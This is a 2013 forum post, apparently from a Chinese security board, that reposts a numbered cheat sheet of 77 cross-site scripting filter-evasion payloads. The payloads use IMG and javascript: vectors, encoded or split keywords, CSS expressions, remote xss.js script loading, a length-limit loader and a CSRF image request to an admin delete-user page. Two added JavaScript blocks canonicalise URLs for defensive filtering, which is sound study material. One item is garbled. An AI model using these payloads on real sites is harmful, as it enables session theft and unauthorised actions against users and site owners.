XSS attack roundup

Posted 2013-4-19 19:22:37
It seems t00ls has rather little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a javascript: URL
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML character references (with semicolons); decodes to javascript:alert("XSS")
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the javascript keyword (a literal tab character between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab splitting the javascript keyword
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript, an extreme XSS case: every character of the vector is separated by a line break (collapsed onto one line here)
<IMG SRC="javascript:alert('XSS')">
(16) Getting around length limits on a single field (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null byte 2 (null bytes are basically useless domestically, because there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the javascript: in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
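The reason items (3) through (15), (17) and (19) get past a substring filter is that the browser decodes character references and discards control characters before it reads the URL scheme, so a filter has to perform the same canonicalisation before it compares anything. The following is an added example (my code, not from the original post or the cheat sheet it was copied from): a decoder for numeric character references with and without semicolons, a strip of the characters a browser ignores in a URL attribute, and a scheme check on the result, run side by side with a naive substring filter. The naive filter is a constructed strawman, the stripped-character set is my choice (it over-approximates the ranges listed in item (47), which is the safe direction for a filter), and the vector strings are constructed from the items above.

```javascript
// Added example: canonicalise an HTML URL attribute value the way a browser
// effectively does, then check its scheme. Not code from the original post.

// Decode numeric character references. The HTML parser accepts decimal
// (&#106;), hex (&#x6A;), arbitrary zero padding (&#0000106;) and, inside
// attribute values, the forms without a terminating semicolon.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Characters to discard before reading the scheme: C0 controls and space
// (1-32, which covers tab/LF/CR and the NUL of item 17), NBSP, the U+2000
// block spaces, ideographic space and the BOM. Assumption: this set is chosen
// to cover the ranges item (47) lists, not copied from any browser.
const IGNORED_IN_URL = /[\u0000-\u0020\u00a0\u2000-\u200f\u3000\ufeff]/g;

// Schemes on this page that execute script from SRC/HREF/BACKGROUND/url().
const SCRIPT_SCHEME = /^(?:javascript|vbscript):/;

function canonicalizeUrlAttr(raw) {
  return decodeNumericRefs(raw).replace(IGNORED_IN_URL, '').toLowerCase();
}

// Robust check: decode, strip, fold case, then look at the scheme prefix.
function isScriptUrl(raw) {
  return SCRIPT_SCHEME.test(canonicalizeUrlAttr(raw));
}

// Strawman: the substring filter that items (4)-(15) are designed to evade.
function naiveFilterCatches(raw) {
  return raw.includes('javascript:');
}

// Constructed attribute values mirroring the vectors above (item number in the comment).
const VECTORS = [
  "javascript:alert('XSS')",                                                       // (2)/(3)
  "JaVaScRiPt:alert('XSS')",                                                       // (4)
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)',     // (5)
  '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)', // (9)
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',           // (10)
  "jav\tascript:alert('XSS')",                                                     // (11)
  "jav&#x0A;ascript:alert('XSS')",                                                 // (13)
  "java\u0000script:alert('XSS')",                                                 // (17)
  " &#14;  javascript:alert('XSS')",                                               // (19)
  'vbscript:msgbox("XSS")',                                                        // (40)
  'http://3w.org/XSS/xss.js',                                                      // benign
  'javascript_tutorial.html',                                                      // benign
];

// One row per vector so the two checks can be compared side by side.
function compareFilters(vectors = VECTORS) {
  return vectors.map(v => ({ raw: v, naive: naiveFilterCatches(v), canonical: isScriptUrl(v) }));
}

// Number of vectors the canonical check flags but the naive filter lets through.
function missedByNaive(vectors = VECTORS) {
  return compareFilters(vectors).filter(r => r.canonical && !r.naive).length;
}

console.table(compareFilters());
console.log('missed by naive filter:', missedByNaive());
```

Run it with node; the naive filter lets 8 of the 12 constructed vectors through while the canonical check flags every scripted scheme and neither benign string. The check deliberately strips more than any one browser does, so it can reject a harmless value that a current browser would not execute, but it will not accept a value that some browser turns into javascript:.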
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG with VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted before the javascript: (any of code points 1-32, 34, 39, 160, 8192-8[...]8, 13, 12288, 65279 work); here code point 1 is inserted
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression keyword split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter is parsed as a tag)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with a mangled expression (only the tail of the vector survives in this copy)
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside the Flash file you can smuggle your XSS in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace: the .htc file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image file and load that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the browser sends the request with the victim's cookies, so any action the target site performs on a GET runs as the victim (CSRF)
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg on the same server as the page): an Apache redirect turns the image fetch into the admin request
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Getting past filters that stop at the first ">" or pair up angle brackets
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass (IP address instead of a hostname)
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding (decodes to http://3w.org)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) IP as a decimal integer
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding: a newline and literal tabs inside the URL plus decimal, octal and hex octets
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
(74) Dropping "http:" (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>
(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
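Items (68) through (77) all rely on a link filter comparing the raw HREF string against what it expects, while the browser's URL parser strips whitespace, percent-decodes, and accepts decimal, hex, octal and short-form IPv4 addresses. The following is an added example (my code, not from the original post) that resolves an HREF to a canonical scheme and host before an allow-list comparison. It assumes its input is the attribute value after HTML character references have been decoded (so an encoded tab is already a tab), the IPv4 rules follow the WHATWG URL parser, and the sample hrefs are constructed from the items above.

```javascript
// Added example: canonicalise scheme and host of a link before comparing it
// with an allow-list. Not code from the original post.

// Tab, LF and CR are removed anywhere in a URL; leading and trailing C0
// controls and spaces are trimmed (item 73).
function stripUrlNoise(href) {
  return href.replace(/[\t\r\n]/g, '').replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// One IPv4 "number": 0x-prefixed hex (item 71), leading-zero octal (item 72)
// or plain decimal. "08"/"09" are invalid octal and therefore not an IPv4 part.
function parseIpv4Number(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(1 + 1), 16);
  if (/^0[0-7]+$/.test(part)) return parseInt(part, 8);
  if (/^0\d/.test(part)) return NaN;
  if (/^\d+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// IPv4 parsing as URL parsers do it: one to four numbers, the last one
// filling all remaining bytes, so "3232235521" (item 70) is a valid address.
// Returns the dotted quad, or null when the host is not an IPv4 literal.
function parseIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length > 4 || parts.some(p => p === '')) return null;
  const nums = parts.map(parseIpv4Number);
  if (nums.some(Number.isNaN)) return null;
  if (nums.slice(0, -1).some(n => n > 255)) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let addr = last;
  nums.slice(0, -1).forEach((n, i) => { addr += n * 256 ** (3 - i); });
  return [addr >>> 24, (addr >>> 16) & 255, (addr >>> 8) & 255, addr & 255].join('.');
}

// Split scheme and host. A missing scheme with a leading "//" inherits the
// page's scheme (item 74); percent-encoded host bytes are decoded (item 69);
// the trailing dot of an absolute DNS name is dropped (item 76). A javascript:
// link (item 77) or a relative path has no host at all.
function canonicalHost(rawHref, pageScheme = 'http') {
  const href = stripUrlNoise(rawHref);
  const m = /^(?:([a-z][a-z0-9+.\-]*):)?(?:\/\/([^\/?#]*))?/i.exec(href);
  const scheme = (m[1] || pageScheme).toLowerCase();
  if (m[2] === undefined) return { scheme, host: null };
  let host = m[2].replace(/:\d*$/, '');          // drop an explicit port
  try { host = decodeURIComponent(host).toLowerCase(); } catch (e) { return { scheme, host: null }; }
  if (host.endsWith('.')) host = host.slice(0, -1);
  return { scheme, host: parseIpv4(host) || host };
}

// Allow-list comparison on the canonical form, not on the raw string.
function linkPointsTo(rawHref, allowedHost, pageScheme = 'http') {
  const { scheme, host } = canonicalHost(rawHref, pageScheme);
  return (scheme === 'http' || scheme === 'https') && host === allowedHost;
}

// Constructed hrefs mirroring items (68)-(77); "\t" stands for the tab that
// an &#9; reference would have decoded to.
const SAMPLE_HREFS = [
  'http://127.0.0.1/',
  'http://%33%77%2E%6F%72%67',
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01',
  'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://google.com/',
  'http://www.google.com./',
  "javascript:document.location='http://www.google.com/'",
];

function resolveAll(hrefs = SAMPLE_HREFS) {
  return hrefs.map(h => ({ href: h, ...canonicalHost(h) }));
}

console.table(resolveAll());
```

Items (70), (71) and (72) all resolve to 192.168.0.1 and item (73) to 66.102.7.147, while the javascript: link comes back with no host at all, which is why a link check should run on the canonical scheme and host rather than on the string the page author typed. A WHATWG URL parser (new URL() in browsers and Node) applies the same IPv4 rules, so its hostname output is a convenient cross-check for the dotted-quad cases.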
Original source: http://fuzzexp.org/u/0day/?p=143